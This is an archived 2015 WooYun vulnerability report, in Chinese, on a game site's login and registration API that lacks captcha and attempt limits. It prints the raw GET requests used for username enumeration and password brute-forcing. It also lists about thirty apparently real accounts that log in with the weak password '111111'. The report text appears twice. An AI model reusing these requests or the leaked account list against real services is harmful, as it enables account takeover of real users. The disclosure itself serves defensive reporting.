当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122778

漏洞标题:49游某接口逻辑缺陷设计缺陷可进行扫号(可获取大量账号密码)

相关厂商:49you.com

漏洞作者: 艾薇儿

提交时间:2015-06-25 22:12

修复时间:2015-08-10 02:16

公开时间:2015-08-10 02:16

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-26: 厂商已经确认,细节仅向厂商公开
2015-07-06: 细节向核心白帽子及相关领域专家公开
2015-07-16: 细节向普通白帽子公开
2015-07-26: 细节向实习白帽子公开
2015-08-10: 细节向公众公开

简要描述:

RT 听说厂商很任性哇

详细说明:

0x01
49you手游 http://m.49you.com/
登录功能没有设置验证码及登录错误次数限制,导致可爆破密码或撞库

0x02

首先我们可以通过注册功能来获取一部分用户名

QQ20150625-3@2x.png


用户名为字母与数字组合

QQ20150625-4@2x.png


这个注册功能的验证码不会刷新,那我们就可以抓取这个请求。来获取一部分用户名字典
注册的请求为GET请求,,,,很是 “给力”

GET /V7/Accounts/WebRegister?callback=jQuery18305054380079761739_1435239707930&requestId=233&sign=233&appId=233&password=111111&code=2837&name=a123456&device=3&_=1435240405535 HTTP/1.1
Host: api.sdk.49app.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.49you.com/
Cookie: verify=353de26971b93af88da102641069b440
Connection: keep-alive


放到工具里面跑用户名的发现一个问题
length 507的为 已经存在的用户名

QQ20150625-5@2x.png


length 2333的 为注册成功。。。。。批量注册用户哇,也是一个安全问题

QQ20150625-6@2x.png


继续说撞库和爆破吧
测试登录,抓取登录的请求,也是GET 想想也是醉了

GET /V7/Accounts/LogOn?callback=jQuery18305054380079761739_1435239707930&requestId=233&sign=233&ver=233&userName=123456&password=111111&appId=233&device=3&_=1435240922900 HTTP/1.1
Host: api.sdk.49app.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.49you.com/
Cookie: verify=353de26971b93af88da102641069b440
Connection: keep-alive


放到工具去批量跑下弱密码 111111
账号密码错误的

QQ20150625-7@2x.png


登录成功的

QQ20150625-8@2x.png


测试登录

QQ20150625-9@2x.png


部分账号:用户名后➕1
aaaaaa1
aaberg1
aachen1
aahing1
aaliis1
aammii1
aargau1
aarhus1
aarika1
aarrgh1
ababua1
abacas1
abacay1
abacli1
abacot1
abacus1
abadan1
abadia1
abakan1
abakas1
abamps1
abanet1
abanga1
abanic1
abaris1
abased1
abaser1
abases1
abasgi1
abasia1
。。。。。

漏洞证明:

0x01
49you手游 http://m.49you.com/
登录功能没有设置验证码及登录错误次数限制,导致可爆破密码或撞库

0x02

首先我们可以通过注册功能来获取一部分用户名

QQ20150625-3@2x.png


用户名为字母与数字组合

QQ20150625-4@2x.png


这个注册功能的验证码不会刷新,那我们就可以抓取这个请求。来获取一部分用户名字典
注册的请求为GET请求,,,,很是 “给力”

GET /V7/Accounts/WebRegister?callback=jQuery18305054380079761739_1435239707930&requestId=233&sign=233&appId=233&password=111111&code=2837&name=a123456&device=3&_=1435240405535 HTTP/1.1
Host: api.sdk.49app.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.49you.com/
Cookie: verify=353de26971b93af88da102641069b440
Connection: keep-alive


放到工具里面跑用户名的发现一个问题
length 507的为 已经存在的用户名

QQ20150625-5@2x.png


length 2333的 为注册成功。。。。。批量注册用户哇,也是一个安全问题

QQ20150625-6@2x.png


继续说撞库和爆破吧
测试登录,抓取登录的请求,也是GET 想想也是醉了

GET /V7/Accounts/LogOn?callback=jQuery18305054380079761739_1435239707930&requestId=233&sign=233&ver=233&userName=123456&password=111111&appId=233&device=3&_=1435240922900 HTTP/1.1
Host: api.sdk.49app.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://m.49you.com/
Cookie: verify=353de26971b93af88da102641069b440
Connection: keep-alive


放到工具去批量跑下弱密码 111111
账号密码错误的

QQ20150625-7@2x.png


登录成功的

QQ20150625-8@2x.png


测试登录

QQ20150625-9@2x.png


部分账号:用户名后➕1
aaaaaa1
aaberg1
aachen1
aahing1
aaliis1
aammii1
aargau1
aarhus1
aarika1
aarrgh1
ababua1
abacas1
abacay1
abacli1
abacot1
abacus1
abadan1
abadia1
abakan1
abakas1
abamps1
abanet1
abanga1
abanic1
abaris1
abased1
abaser1
abases1
abasgi1
abasia1
。。。。。

修复方案:

加验证码及登录次数限制

版权声明:转载请注明来源 艾薇儿@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-26 02:14

厂商回复:

影响不大,但还是感谢提交漏洞,稍后统一小礼物送上,叁万还在等着你们!

最新状态:

暂无